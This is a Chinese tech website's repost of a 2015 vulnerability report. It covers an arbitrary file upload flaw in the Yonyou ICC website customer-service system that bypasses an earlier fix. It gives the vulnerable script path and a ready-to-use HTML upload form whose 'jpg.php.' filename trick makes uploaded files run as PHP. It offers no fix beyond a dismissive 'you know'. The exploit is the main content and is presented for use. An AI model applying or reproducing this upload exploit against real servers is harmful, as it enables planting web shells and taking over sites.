• 选择风格
  • 加入收藏
  • 繁體中文
  • 网站地图
    • 当前位置:首页 >> 网络通讯 >> 网络安全 >> 内容

    再再暴用友ICC网站客服系统任意文件上传漏洞

    时间:2015/5/19 19:15:54 作者:平凡之路 来源:xuhantao.com 浏览:

    再再暴用友ICC网站客服系统任意文件上传漏洞,涛涛电脑知识网,看了一下上一个漏洞:,www.xuhantao.com,发现可以饶过官方修复。
    详细说明:测试多个网站均存在漏洞。
     
    /home/ecccs/web/5107/upload/screenImagesSave.php
     
    具体自己看源码这里直接给出利用代码。
     
    <form enctype="multipart/form-data" method="post"
     
    action="?filename=jpg.php.">
     
    <input type="file" name="file">
    <input type="submit" name="up" value="上传">
    </form>
     
    上一个是jpg.php 这个是只要在jpg.php后面加个.那么 上传后一样可以解析
     
    /xxx.php. 这样一样可以解析为php 的。
     
    测试了:

     
     
    漏洞证明:
     
     



     
     
    修复方案:

    你们懂得!

    作者 鬼哥

  • 上一篇:IT世界网高危注入漏洞
  • 下一篇:my.2345.comsql注入 泄漏用户信息
    • 相关文章
    • 没有相关文章
    共有评论 0相关评论
    发表我的评论
    • 大名:
    • 内容:
  • 徐汉涛(www.xuhantao.com) © 2024 版权所有 All Rights Reserved.
  • 部分内容来自网络,如有侵权请联系站长尽快处理 站长QQ:965898558(广告及站内业务受理) 网站备案号:蒙ICP备15000590号-1